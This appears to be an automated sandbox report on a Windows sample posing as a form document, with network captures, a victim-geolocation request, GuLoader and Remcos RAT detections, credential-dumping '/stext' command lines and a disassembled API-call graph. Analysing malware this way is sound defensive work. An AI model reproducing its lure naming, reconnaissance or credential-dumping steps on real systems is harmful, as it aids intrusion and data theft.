                                                                                                            Nov 21, 2024 12:20:15.335134029 CET1236INData Raw: 6a 32 e7 96 b2 42 0a b1 47 56 27 50 a2 cf 72 3c b6 b9 57 ac 91 00 ff 54 a5 e9 b7 3b 38 d5 96 7c 14 0b 8d 33 80 08 c5 d0 f9 ba 44 50 56 f8 83 46 0b fb 64 d9 61 cd 8a 15 16 da 3e 7f 14 15 37 84 db 4c 50 54 e4 07 03 f0 37 fc 91 4e 37 47 5f 8d fd 27
                                                                                                            Data Ascii: j2BGV'Pr<WT;8|3DPVFda>7LPT7N7G_'JtI3\:dku$82|(OX05&*AL{eDbyQOU9PKYf~TK6]'{G.#}I#"~ +:Z*=F-
                                                                                                            Nov 21, 2024 12:20:15.335150003 CET1236INData Raw: cd c2 cf b6 e3 04 a6 5b 53 70 3d 80 a1 39 31 ea 79 a9 93 8c 39 40 4a 41 99 fa 45 06 3d e1 e1 30 5e 2a c5 59 25 02 32 26 59 be 18 fa e9 93 6c 4a 9e 8f cd 44 e0 9f e3 d5 07 e4 7f 5a fe 40 c7 7c b2 d3 2f 41 dd f3 d2 c9 47 14 af fa 48 a3 8a ab 52 13
                                                                                                            Data Ascii: [Sp=91y9@JAE=0^*Y%2&YlJDZ@|/AGHR!BlGC6:0b0+KQKq:xc<Gqr;7PN[#Z\VU#I# D.f?N:t|_Ud_/t9P'06g1|FM]5"ORz@=E
                                                                                                            Nov 21, 2024 12:20:15.335158110 CET1236INData Raw: 52 e7 16 20 3e 72 e4 0e 42 3f 8a dc 5d e9 a3 1e 44 14 ea 13 4a c2 fb 43 d4 89 9d 8a 34 de 1b 81 80 de 68 bb 84 8e 99 6e 2c 93 63 66 be e3 2f a7 85 f7 5b 7a 0c 5f 35 c0 ec 06 ba 2b 9e ea 0b 58 fc 6a 71 3b e5 78 10 d3 5e 4a b6 87 26 7d ac 0a cd 0e
                                                                                                            Data Ascii: R >rB?]DJC4hn,cf/[z_5+Xjq;x^J&}unaI&SHHJp=;@w0HC^C6Y.0~M:#O`8a6\r3<B%cDC_%` $7C~NI(2C$ajD&ID[r|g#QqN
                                                                                                            Nov 21, 2024 12:20:15.335166931 CET1236INData Raw: 7d 9d b3 95 a4 e2 c3 bc 26 98 9e 0b 88 3b 4c b0 e3 da 57 07 0f 46 25 f3 f5 12 51 6c 73 3b 3a 70 d1 2a 84 b4 fd 44 66 a6 47 42 73 f4 16 89 3d ec b2 e1 51 34 33 c0 ec fe 43 b2 16 f1 00 a9 b4 93 d9 18 3a 67 19 32 95 d7 3e 11 c9 9d 44 45 f4 45 8c 53
                                                                                                            Data Ascii: }&;LWF%Qls;:p*DfGBs=Q43C:g2>DEES;5~v5"wJ[Q8[Y_Q!%=0F7vZ-^n'3!OuL`8z#li1h:@Xf.f<R7l4(A:m
                                                                                                            Nov 21, 2024 12:20:15.455786943 CET1236INData Raw: 7a c5 22 99 2f 53 47 6b e8 ae 7f 1a cb 5f c4 5c 4d 95 d4 ad 14 19 f3 28 22 9d 09 2b 22 15 c7 16 b0 9b 84 1e 52 ef c5 31 42 5d 86 cb 63 98 fb 5a 14 a8 19 4e fc af d6 25 06 cf 97 7b 4f 2f a0 4b b0 4f ed 4b bf 66 1e 3f e1 fe 12 73 57 54 1d 95 68 ed
                                                                                                            Data Ascii: z"/SGk_\M("+"R1B]cZN%{O/KOKf?sWTh~uHeQEj/K-x5NYn^uo6KL&A:XNkjK{DH(3JQ-KV+E`80lO,%uQ8i[?:kh%^=


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.749842178.237.33.50806836C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 21, 2024 12:20:19.661390066 CET71OUTGET /json.gp HTTP/1.1
                                                                                                            Host: geoplugin.net
                                                                                                            Cache-Control: no-cache
                                                                                                            Nov 21, 2024 12:20:20.949599028 CET1170INHTTP/1.1 200 OK
                                                                                                            date: Thu, 21 Nov 2024 11:20:20 GMT
                                                                                                            server: Apache
                                                                                                            content-length: 962
                                                                                                            content-type: application/json; charset=utf-8
                                                                                                            cache-control: public, max-age=300
                                                                                                            access-control-allow-origin: *
                                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:06:19:20
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:697'930 bytes
                                                                                                            MD5 hash:CF4530628BDB401E066EA81E86403D77
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1832413744.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:06:20:07
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:697'930 bytes
                                                                                                            MD5 hash:CF4530628BDB401E066EA81E86403D77
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:06:20:22
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hhicqmxmcuubmwccmnspqit"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:697'930 bytes
                                                                                                            MD5 hash:CF4530628BDB401E066EA81E86403D77
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:06:20:22
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\rjnmrfinqcmgocyodymjbnnrmv"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:697'930 bytes
                                                                                                            MD5 hash:CF4530628BDB401E066EA81E86403D77
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:06:20:22
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsfsxbheketyimsnjzkeaiancxhuh"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:697'930 bytes
                                                                                                            MD5 hash:CF4530628BDB401E066EA81E86403D77
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:18.9%
                                                                                                              Dynamic/Decrypted Code Coverage:15.3%
                                                                                                              Signature Coverage:20.2%
                                                                                                              Total number of Nodes:1513
                                                                                                              Total number of Limit Nodes:43
                                                                                                              execution_graph 4888 10001000 4891 1000101b 4888->4891 4898 100014d8 4891->4898 4893 10001020 4894 10001024 4893->4894 4895 10001027 GlobalAlloc 4893->4895 4896 100014ff 3 API calls 4894->4896 4895->4894 4897 10001019 4896->4897 4899 1000123b 3 API calls 4898->4899 4900 100014de 4899->4900 4901 100014e4 4900->4901 4902 100014f0 GlobalFree 4900->4902 4901->4893 4902->4893 4903 4019c0 4904 4029ff 18 API calls 4903->4904 4905 4019c7 4904->4905 4906 4029ff 18 API calls 4905->4906 4907 4019d0 4906->4907 4908 4019d7 lstrcmpiA 4907->4908 4909 4019e9 lstrcmpA 4907->4909 4910 4019dd 4908->4910 4909->4910 3938 4022c2 3939 4022f2 3938->3939 3940 4022c7 3938->3940 3942 4029ff 18 API calls 3939->3942 3950 402b09 3940->3950 3945 4022f9 3942->3945 3943 4022ce 3944 4022d8 3943->3944 3949 40230f 3943->3949 3946 4029ff 18 API calls 3944->3946 3954 402a3f RegOpenKeyExA 3945->3954 3948 4022df RegDeleteValueA RegCloseKey 3946->3948 3948->3949 3951 4029ff 18 API calls 3950->3951 3952 402b22 3951->3952 3953 402b30 RegOpenKeyExA 3952->3953 3953->3943 3955 402ad3 3954->3955 3958 402a6a 3954->3958 3955->3949 3956 402a90 RegEnumKeyA 3957 402aa2 RegCloseKey 3956->3957 3956->3958 3965 40600b GetModuleHandleA 3957->3965 3958->3956 3958->3957 3960 402ac7 RegCloseKey 3958->3960 3961 402a3f 3 API calls 3958->3961 3963 402ab6 3960->3963 3961->3958 3963->3955 3964 402ae2 RegDeleteKeyA 3964->3963 3966 406032 GetProcAddress 3965->3966 3967 406027 LoadLibraryA 3965->3967 3968 402ab2 3966->3968 3967->3966 3967->3968 3968->3963 3968->3964 4918 402b44 4919 402b53 SetTimer 4918->4919 4920 402b6c 4918->4920 4919->4920 4921 402bba 4920->4921 4922 402bc0 MulDiv 4920->4922 4923 402b7a wsprintfA SetWindowTextA SetDlgItemTextA 4922->4923 4923->4921 4925 4043c5 4926 4043d5 4925->4926 4927 4043fb 4925->4927 4932 403fce 4926->4932 4935 404035 4927->4935 4930 4043e2 SetDlgItemTextA 4930->4927 4933 405d02 18 API calls 4932->4933 4934 403fd9 SetDlgItemTextA 4933->4934 4934->4930 4936 40404d GetWindowLongA 4935->4936 4946 4040d6 4935->4946 4937 40405e 4936->4937 4936->4946 4938 404070 4937->4938 4939 40406d GetSysColor 4937->4939 4940 404080 SetBkMode 4938->4940 4941 404076 SetTextColor 4938->4941 4939->4938 4942 404098 GetSysColor 4940->4942 4943 40409e 4940->4943 4941->4940 4942->4943 4944 4040a5 SetBkColor 4943->4944 4945 4040af 4943->4945 4944->4945 4945->4946 4947 4040c2 DeleteObject 4945->4947 4948 4040c9 CreateBrushIndirect 4945->4948 4947->4948 4948->4946 3969 402647 3970 4029ff 18 API calls 3969->3970 3971 40264e FindFirstFileA 3970->3971 3972 402671 3971->3972 3973 402661 3971->3973 3977 405c3e wsprintfA 3972->3977 3975 402678 3978 405ce0 lstrcpynA 3975->3978 3977->3975 3978->3973 4949 404948 GetDlgItem GetDlgItem 4950 40499a 7 API calls 4949->4950 4957 404bb2 4949->4957 4951 404a30 SendMessageA 4950->4951 4952 404a3d DeleteObject 4950->4952 4951->4952 4953 404a46 4952->4953 4955 404a7d 4953->4955 4956 405d02 18 API calls 4953->4956 4954 404c96 4959 404d42 4954->4959 4968 404cef SendMessageA 4954->4968 4991 404ba5 4954->4991 4958 403fce 19 API calls 4955->4958 4960 404a5f SendMessageA SendMessageA 4956->4960 4957->4954 4992 404c23 4957->4992 5002 404896 SendMessageA 4957->5002 4963 404a91 4958->4963 4961 404d54 4959->4961 4962 404d4c SendMessageA 4959->4962 4960->4953 4970 404d66 ImageList_Destroy 4961->4970 4971 404d6d 4961->4971 4977 404d7d 4961->4977 4962->4961 4967 403fce 19 API calls 4963->4967 4964 404035 8 API calls 4969 404f38 4964->4969 4965 404c88 SendMessageA 4965->4954 4982 404a9f 4967->4982 4973 404d04 SendMessageA 4968->4973 4968->4991 4970->4971 4975 404d76 GlobalFree 4971->4975 4971->4977 4972 404eec 4978 404efe ShowWindow GetDlgItem ShowWindow 4972->4978 4972->4991 4974 404d17 4973->4974 4984 404d28 SendMessageA 4974->4984 4975->4977 4976 404b73 GetWindowLongA SetWindowLongA 4979 404b8c 4976->4979 4977->4972 4994 404db8 4977->4994 5007 404916 4977->5007 4978->4991 4980 404b92 ShowWindow 4979->4980 4981 404baa 4979->4981 5000 404003 SendMessageA 4980->5000 5001 404003 SendMessageA 4981->5001 4982->4976 4983 404aee SendMessageA 4982->4983 4985 404b6d 4982->4985 4988 404b2a SendMessageA 4982->4988 4989 404b3b SendMessageA 4982->4989 4983->4982 4984->4959 4985->4976 4985->4979 4988->4982 4989->4982 4991->4964 4992->4954 4992->4965 4993 404ec2 InvalidateRect 4993->4972 4995 404ed8 4993->4995 4996 404de6 SendMessageA 4994->4996 4997 404dfc 4994->4997 5016 4047b4 4995->5016 4996->4997 4997->4993 4999 404e70 SendMessageA SendMessageA 4997->4999 4999->4997 5000->4991 5001->4957 5003 4048f5 SendMessageA 5002->5003 5004 4048b9 GetMessagePos ScreenToClient SendMessageA 5002->5004 5006 4048ed 5003->5006 5005 4048f2 5004->5005 5004->5006 5005->5003 5006->4992 5024 405ce0 lstrcpynA 5007->5024 5009 404929 5025 405c3e wsprintfA 5009->5025 5011 404933 5012 40140b 2 API calls 5011->5012 5013 40493c 5012->5013 5026 405ce0 lstrcpynA 5013->5026 5015 404943 5015->4994 5017 4047ce 5016->5017 5018 405d02 18 API calls 5017->5018 5019 404803 5018->5019 5020 405d02 18 API calls 5019->5020 5021 40480e 5020->5021 5022 405d02 18 API calls 5021->5022 5023 40483f lstrlenA wsprintfA SetDlgItemTextA 5022->5023 5023->4972 5024->5009 5025->5011 5026->5015 3983 4023ca 3984 402b09 19 API calls 3983->3984 3985 4023d4 3984->3985 3986 4029ff 18 API calls 3985->3986 3987 4023dd 3986->3987 3988 4023e7 RegQueryValueExA 3987->3988 3991 402665 3987->3991 3989 40240d RegCloseKey 3988->3989 3990 402407 3988->3990 3989->3991 3990->3989 3994 405c3e wsprintfA 3990->3994 3994->3989 5030 401ccc GetDlgItem GetClientRect 5031 4029ff 18 API calls 5030->5031 5032 401cfc LoadImageA SendMessageA 5031->5032 5033 402894 5032->5033 5034 401d1a DeleteObject 5032->5034 5034->5033 5035 40474e 5036 40477a 5035->5036 5037 40475e 5035->5037 5039 404780 SHGetPathFromIDListA 5036->5039 5040 4047ad 5036->5040 5046 4054d8 GetDlgItemTextA 5037->5046 5042 404790 5039->5042 5043 404797 SendMessageA 5039->5043 5041 40476b SendMessageA 5041->5036 5044 40140b 2 API calls 5042->5044 5043->5040 5044->5043 5046->5041 3995 401650 3996 4029ff 18 API calls 3995->3996 3997 401657 3996->3997 3998 4029ff 18 API calls 3997->3998 3999 401660 3998->3999 4000 4029ff 18 API calls 3999->4000 4001 401669 MoveFileA 4000->4001 4002 401675 4001->4002 4003 40167c 4001->4003 4017 401423 4002->4017 4007 402183 4003->4007 4009 405fe4 FindFirstFileA 4003->4009 4010 40168b 4009->4010 4011 405ffa FindClose 4009->4011 4010->4007 4012 405b94 4010->4012 4011->4010 4013 40600b 3 API calls 4012->4013 4015 405b9b 4013->4015 4016 405bbc 4015->4016 4020 405a18 lstrcpyA 4015->4020 4016->4002 4054 404fcb 4017->4054 4021 405a41 4020->4021 4022 405a67 GetShortPathNameA 4020->4022 4045 405971 GetFileAttributesA CreateFileA 4021->4045 4024 405a7c 4022->4024 4025 405b8e 4022->4025 4024->4025 4027 405a84 wsprintfA 4024->4027 4025->4016 4026 405a4b CloseHandle GetShortPathNameA 4026->4025 4028 405a5f 4026->4028 4029 405d02 18 API calls 4027->4029 4028->4022 4028->4025 4030 405aac 4029->4030 4046 405971 GetFileAttributesA CreateFileA 4030->4046 4032 405ab9 4032->4025 4033 405ac8 GetFileSize GlobalAlloc 4032->4033 4034 405b87 CloseHandle 4033->4034 4035 405aea 4033->4035 4034->4025 4047 4059e9 ReadFile 4035->4047 4040 405b09 lstrcpyA 4043 405b2b 4040->4043 4041 405b1d 4042 4058d6 4 API calls 4041->4042 4042->4043 4044 405b62 SetFilePointer WriteFile GlobalFree 4043->4044 4044->4034 4045->4026 4046->4032 4048 405a07 4047->4048 4048->4034 4049 4058d6 lstrlenA 4048->4049 4050 405917 lstrlenA 4049->4050 4051 4058f0 lstrcmpiA 4050->4051 4052 40591f 4050->4052 4051->4052 4053 40590e CharNextA 4051->4053 4052->4040 4052->4041 4053->4050 4055 401431 4054->4055 4056 404fe6 4054->4056 4055->4007 4057 405003 lstrlenA 4056->4057 4060 405d02 18 API calls 4056->4060 4058 405011 lstrlenA 4057->4058 4059 40502c 4057->4059 4058->4055 4061 405023 lstrcatA 4058->4061 4062 405032 SetWindowTextA 4059->4062 4063 40503f 4059->4063 4060->4057 4061->4059 4062->4063 4063->4055 4064 405045 SendMessageA SendMessageA SendMessageA 4063->4064 4064->4055 5047 4024d3 5048 4024d8 5047->5048 5049 4024e9 5047->5049 5050 4029e2 18 API calls 5048->5050 5051 4029ff 18 API calls 5049->5051 5053 4024df 5050->5053 5052 4024f0 lstrlenA 5051->5052 5052->5053 5054 40250f WriteFile 5053->5054 5055 402665 5053->5055 5054->5055 4092 4025d5 4093 402841 4092->4093 4094 4025dc 4092->4094 4100 4029e2 4094->4100 4096 4025e7 4097 4025ee SetFilePointer 4096->4097 4097->4093 4098 4025fe 4097->4098 4103 405c3e wsprintfA 4098->4103 4101 405d02 18 API calls 4100->4101 4102 4029f6 4101->4102 4102->4096 4103->4093 4108 4014d6 4109 4029e2 18 API calls 4108->4109 4110 4014dc Sleep 4109->4110 4112 402894 4110->4112 4113 401dd8 4114 4029ff 18 API calls 4113->4114 4115 401dde 4114->4115 4116 4029ff 18 API calls 4115->4116 4117 401de7 4116->4117 4118 4029ff 18 API calls 4117->4118 4119 401df0 4118->4119 4120 4029ff 18 API calls 4119->4120 4121 401df9 4120->4121 4122 401423 25 API calls 4121->4122 4123 401e00 ShellExecuteA 4122->4123 4124 401e2d 4123->4124 5063 40155b 5064 401577 ShowWindow 5063->5064 5065 40157e 5063->5065 5064->5065 5066 402894 5065->5066 5067 40158c ShowWindow 5065->5067 5067->5066 5068 401edc 5069 4029ff 18 API calls 5068->5069 5070 401ee3 GetFileVersionInfoSizeA 5069->5070 5071 401f06 GlobalAlloc 5070->5071 5072 401f5c 5070->5072 5071->5072 5073 401f1a GetFileVersionInfoA 5071->5073 5073->5072 5074 401f2b VerQueryValueA 5073->5074 5074->5072 5075 401f44 5074->5075 5079 405c3e wsprintfA 5075->5079 5077 401f50 5080 405c3e wsprintfA 5077->5080 5079->5077 5080->5072 5081 4040e2 lstrcpynA lstrlenA 5087 4018e3 5088 40191a 5087->5088 5089 4029ff 18 API calls 5088->5089 5090 40191f 5089->5090 5091 4055a0 71 API calls 5090->5091 5092 401928 5091->5092 5093 4018e6 5094 4029ff 18 API calls 5093->5094 5095 4018ed 5094->5095 5096 4054f4 MessageBoxIndirectA 5095->5096 5097 4018f6 5096->5097 4535 401f68 4536 401f7a 4535->4536 4537 402028 4535->4537 4538 4029ff 18 API calls 4536->4538 4539 401423 25 API calls 4537->4539 4540 401f81 4538->4540 4546 402183 4539->4546 4541 4029ff 18 API calls 4540->4541 4542 401f8a 4541->4542 4543 401f92 GetModuleHandleA 4542->4543 4544 401f9f LoadLibraryExA 4542->4544 4543->4544 4545 401faf GetProcAddress 4543->4545 4544->4537 4544->4545 4547 401ffb 4545->4547 4548 401fbe 4545->4548 4551 404fcb 25 API calls 4547->4551 4549 401fc6 4548->4549 4550 401fdd 4548->4550 4552 401423 25 API calls 4549->4552 4556 100016da 4550->4556 4553 401fce 4551->4553 4552->4553 4553->4546 4554 40201c FreeLibrary 4553->4554 4554->4546 4557 1000170a 4556->4557 4599 10001a86 4557->4599 4559 10001711 4560 10001827 4559->4560 4561 10001722 4559->4561 4562 10001729 4559->4562 4560->4553 4652 100021ce 4561->4652 4633 10002218 4562->4633 4567 1000178d 4572 10001793 4567->4572 4573 100017cf 4567->4573 4568 1000176f 4665 100023d6 4568->4665 4569 10001758 4574 1000175d 4569->4574 4587 1000174e 4569->4587 4570 1000173f 4571 10001745 4570->4571 4577 10001750 4570->4577 4571->4587 4646 10002808 4571->4646 4579 10001576 3 API calls 4572->4579 4581 100023d6 14 API calls 4573->4581 4662 10002ac3 4574->4662 4656 100025a9 4577->4656 4584 100017a9 4579->4584 4585 100017c1 4581->4585 4588 100023d6 14 API calls 4584->4588 4589 100017d6 4585->4589 4587->4567 4587->4568 4588->4585 4591 10001816 4589->4591 4689 1000239c 4589->4689 4591->4560 4594 10001820 GlobalFree 4591->4594 4594->4560 4596 10001802 4596->4591 4693 100014ff wsprintfA 4596->4693 4597 100017fb FreeLibrary 4597->4596 4696 10001215 GlobalAlloc 4599->4696 4601 10001aaa 4697 10001215 GlobalAlloc 4601->4697 4603 10001ab5 4698 1000123b 4603->4698 4605 10001ce4 GlobalFree GlobalFree GlobalFree 4606 10001d01 4605->4606 4625 10001d4b 4605->4625 4607 10001d16 4606->4607 4608 1000203c 4606->4608 4606->4625 4607->4625 4705 10001224 4607->4705 4610 1000205e GetModuleHandleA 4608->4610 4608->4625 4609 10001b89 GlobalAlloc 4628 10001abd 4609->4628 4611 10002084 4610->4611 4612 1000206f LoadLibraryA 4610->4612 4709 100015c1 GetProcAddress 4611->4709 4612->4611 4612->4625 4613 10001bd4 lstrcpyA 4616 10001bde lstrcpyA 4613->4616 4614 10001bf2 GlobalFree 4614->4628 4616->4628 4617 100020d5 4619 100020e2 lstrlenA 4617->4619 4617->4625 4618 10001f9c 4624 10001fe0 lstrcpyA 4618->4624 4618->4625 4710 100015c1 GetProcAddress 4619->4710 4621 10002096 4621->4617 4632 100020bf GetProcAddress 4621->4632 4624->4625 4625->4559 4626 10001c30 4626->4628 4703 10001551 GlobalSize GlobalAlloc 4626->4703 4627 10001e97 GlobalFree 4627->4628 4628->4605 4628->4609 4628->4613 4628->4614 4628->4616 4628->4618 4628->4625 4628->4626 4628->4627 4631 10001224 2 API calls 4628->4631 4708 10001215 GlobalAlloc 4628->4708 4629 100020fb 4629->4625 4631->4628 4632->4617 4639 10002230 4633->4639 4634 10001224 GlobalAlloc lstrcpynA 4634->4639 4635 1000123b 3 API calls 4635->4639 4637 10002365 GlobalFree 4638 1000172f 4637->4638 4637->4639 4638->4569 4638->4570 4638->4587 4639->4634 4639->4635 4639->4637 4640 100022ed GlobalAlloc MultiByteToWideChar 4639->4640 4641 100022cc lstrlenA 4639->4641 4713 100012bf 4639->4713 4642 100022db 4640->4642 4643 10002317 GlobalAlloc 4640->4643 4641->4637 4641->4642 4642->4637 4718 1000253d 4642->4718 4644 1000232e GlobalFree 4643->4644 4644->4637 4648 1000281a 4646->4648 4647 100028bf VirtualAllocEx 4649 100028dd 4647->4649 4648->4647 4650 100029d9 4649->4650 4651 100029ce GetLastError 4649->4651 4650->4587 4651->4650 4653 10001728 4652->4653 4654 100021de 4652->4654 4653->4562 4654->4653 4655 100021f0 GlobalAlloc 4654->4655 4655->4654 4660 100025c5 4656->4660 4657 10002616 GlobalAlloc 4661 10002638 4657->4661 4658 10002629 4659 1000262e GlobalSize 4658->4659 4658->4661 4659->4661 4660->4657 4660->4658 4661->4587 4663 10002ace 4662->4663 4664 10002b0e GlobalFree 4663->4664 4676 100023f1 4665->4676 4667 100024d5 lstrcpyA 4667->4676 4668 10002435 wsprintfA 4668->4676 4669 1000251f GlobalFree 4673 10001775 4669->4673 4669->4676 4670 100024ad lstrcpynA 4670->4676 4671 100024f6 GlobalFree 4671->4676 4672 1000248a WideCharToMultiByte 4672->4676 4678 10001576 4673->4678 4674 10002449 GlobalAlloc StringFromGUID2 WideCharToMultiByte GlobalFree 4674->4676 4675 10001278 2 API calls 4675->4676 4676->4667 4676->4668 4676->4669 4676->4670 4676->4671 4676->4672 4676->4674 4676->4675 4721 10001215 GlobalAlloc 4676->4721 4722 100012e8 4676->4722 4726 10001215 GlobalAlloc 4678->4726 4680 1000157c 4681 10001589 lstrcpyA 4680->4681 4683 100015a3 4680->4683 4684 100015bd 4681->4684 4683->4684 4685 100015a8 wsprintfA 4683->4685 4686 10001278 4684->4686 4685->4684 4687 10001281 GlobalAlloc lstrcpynA 4686->4687 4688 100012ba GlobalFree 4686->4688 4687->4688 4688->4589 4690 100017e2 4689->4690 4691 100023aa 4689->4691 4690->4596 4690->4597 4691->4690 4692 100023c3 GlobalFree 4691->4692 4692->4691 4694 10001278 2 API calls 4693->4694 4695 10001520 4694->4695 4695->4591 4696->4601 4697->4603 4699 10001274 4698->4699 4700 10001245 4698->4700 4699->4628 4700->4699 4711 10001215 GlobalAlloc 4700->4711 4702 10001251 lstrcpyA GlobalFree 4702->4628 4704 1000156f 4703->4704 4704->4626 4712 10001215 GlobalAlloc 4705->4712 4707 10001233 lstrcpynA 4707->4625 4708->4628 4709->4621 4710->4629 4711->4702 4712->4707 4714 100012e3 4713->4714 4715 100012c7 4713->4715 4714->4714 4715->4714 4716 10001224 2 API calls 4715->4716 4717 100012e1 4716->4717 4717->4639 4719 100025a1 4718->4719 4720 1000254b VirtualAlloc 4718->4720 4719->4642 4720->4719 4721->4676 4723 100012f1 4722->4723 4724 10001316 4722->4724 4723->4724 4725 100012fd lstrcpyA 4723->4725 4724->4676 4725->4724 4726->4680 5098 1000182a 5099 1000123b 3 API calls 5098->5099 5100 10001850 5099->5100 5101 1000123b 3 API calls 5100->5101 5102 10001858 5101->5102 5103 1000123b 3 API calls 5102->5103 5106 10001895 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5102->5106 5104 1000187a 5103->5104 5105 10001883 GlobalFree 5104->5105 5105->5106 5107 10001278 2 API calls 5106->5107 5108 10001a0c GlobalFree GlobalFree 5107->5108 